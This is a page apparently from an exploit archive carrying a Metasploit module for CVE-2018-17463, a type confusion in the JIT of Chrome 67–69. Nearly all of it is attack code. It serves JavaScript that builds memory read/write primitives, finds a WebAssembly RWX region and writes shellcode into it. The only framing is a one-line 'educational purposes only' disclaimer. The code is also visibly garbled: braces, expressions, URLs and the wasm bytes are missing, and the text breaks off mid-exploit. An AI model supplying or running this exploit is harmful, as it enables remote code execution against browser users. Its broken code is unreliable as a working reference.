Google chrome 67, 68 and 69 object.create type confusion (metasploit) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-03-09 |
Type : remote |
Platform : multiple
This exploit / vulnerability Google chrome 67, 68 and 69 object.create type confusion (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# This module requires Metasploit:
# Current source:
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',
'Description' => %q{
This modules exploits a type confusion in Google Chromes JIT compiler.
The Object.create operation can be used to cause a type confusion between a
PropertyArray and a NameDictionary.
The payload is executed within the rwx region of the sandboxed renderer
process, so the browser must be run with the --no-sandbox option for the
payload to work.
'License' => MSF_LICENSE,
'Author' => [
'saelo', # discovery and exploit
'timwr', # metasploit module
'References' => [
['CVE', '2018-17463'],
['URL', ''],
['URL', ''],
['URL', ''],
['URL', ''],
'Arch' => [ ARCH_X64 ],
'Platform' => ['windows', 'osx'],
'DefaultTarget' => 0,
'Targets' => [ [ 'Automatic', { } ] ],
'DisclosureDate' => 'Sep 25 2018'))
register_advanced_options(['DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
def on_request_uri(cli, request)
if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
print_status("[*] " + request.body)
send_response(cli, '')
print_status("Sending #{request.uri} to #{request['User-Agent']}")
jscript = %Q^
let shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);
let ab = new ArrayBuffer(8);
let floatView = new Float64Array(ab);
let uint64View = new BigUint64Array(ab);
let uint8View = new Uint8Array(ab);
function gc() {
for (let i = 0; i < 200; i++) {
new ArrayBuffer(0x100000);
function make(properties) {
let o = {inline: 42} // TODO
for (let i = 0; i < NUM_PROPERTIES; i++) {
eval(`o.p${i} = properties[${i}];`);
return o;
function pwn() {
function find_overlapping_properties() {
let propertyNames = [];
for (let i = 0; i < NUM_PROPERTIES; i++) {
propertyNames[i] = `p${i}`;
function vuln(o) {
let a = o.inline;
${ => `let ${p} = o.${p};`).join('\\n')}
return [${propertyNames.join(', ')}];
let propertyValues = [];
for (let i = 1; i < NUM_PROPERTIES; i++) {
propertyValues[i] = -i;
for (let i = 0; i < MAX_ITERATIONS; i++) {
let r = vuln(make(propertyValues));
if (r[1] !== -1) {
for (let i = 1; i < r.length; i++) {
if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
return [i, -r[i]];
fail("Failed to find overlapping properties");
function addrof(obj) {
function vuln(o) {
let a = o.inline;
return o.p${p1}.x1;
let i = 0;
for (; i < MAX_ITERATIONS; i++) {
let res = vuln(make(propertyValues));
if (res !== 13.37)
return res.toBigInt()
fail("Addrof failed");
function corrupt_arraybuffer(victim, newValue) {
function vuln(o) {
let a = o.inline;
let orig = o.p${p1}.x2;
o.p${p1}.x2 = ${newValue.toNumber()};
return orig;
let propertyValues = [];
let o = {x1: 13.37, x2: 13.38};
propertyValues[p1] = o;
propertyValues[p2] = victim;
for (let i = 0; i < MAX_ITERATIONS; i++) {
o.x2 = 13.38;
let r = vuln(make(propertyValues));
if (r !== 13.38)
return r.toBigInt();
fail("Corrupt ArrayBuffer failed");
let [p1, p2] = find_overlapping_properties();
print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);
let memview_buf = new ArrayBuffer(1024);
let driver_buf = new ArrayBuffer(1024);
let memview_buf_addr = addrof(memview_buf);
print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);
let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);
let driver = new BigUint64Array(driver_buf);
let original_memview_buf_ptr = driver[4];
let memory = {
write(addr, bytes) {
driver[4] = addr;
let memview = new Uint8Array(memview_buf);
read(addr, len) {
driver[4] = addr;
let memview = new Uint8Array(memview_buf);
return memview.subarray(0, len);
readPtr(addr) {
driver[4] = addr;
let memview = new BigUint64Array(memview_buf);
return memview[0];
writePtr(addr, ptr) {
driver[4] = addr;
let memview = new BigUint64Array(memview_buf);
memview[0] = ptr;
addrof(obj) {
memview_buf.leakMe = obj;
let props = this.readPtr(memview_buf_addr + 8n);
return this.readPtr(props + 15n) - 1n;
// Generate a RWX region for the payload
function get_wasm_instance() {
var buffer = new Uint8Array([
return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});
let wasm_instance = get_wasm_instance();
let wasm_addr = memory.addrof(wasm_instance);
print("wasm_addr @ " + hex(wasm_addr));
let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);
print("wasm_rwx @ " + hex(wasm_rwx_addr));
memory.write(wasm_rwx_addr, shellcode);
let fake_vtab = new ArrayBuffer(0x80);
let fake_vtab_u64 = new BigUint64Array(fake_vtab);
let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);
let div = document.createElement('div');
let div_addr = memory.addrof(div);
print('div_addr @ ' + hex(div_addr));
let el_addr = memory.readPtr(div_addr + 0x20n);
print('el_addr @ ' + hex(div_addr));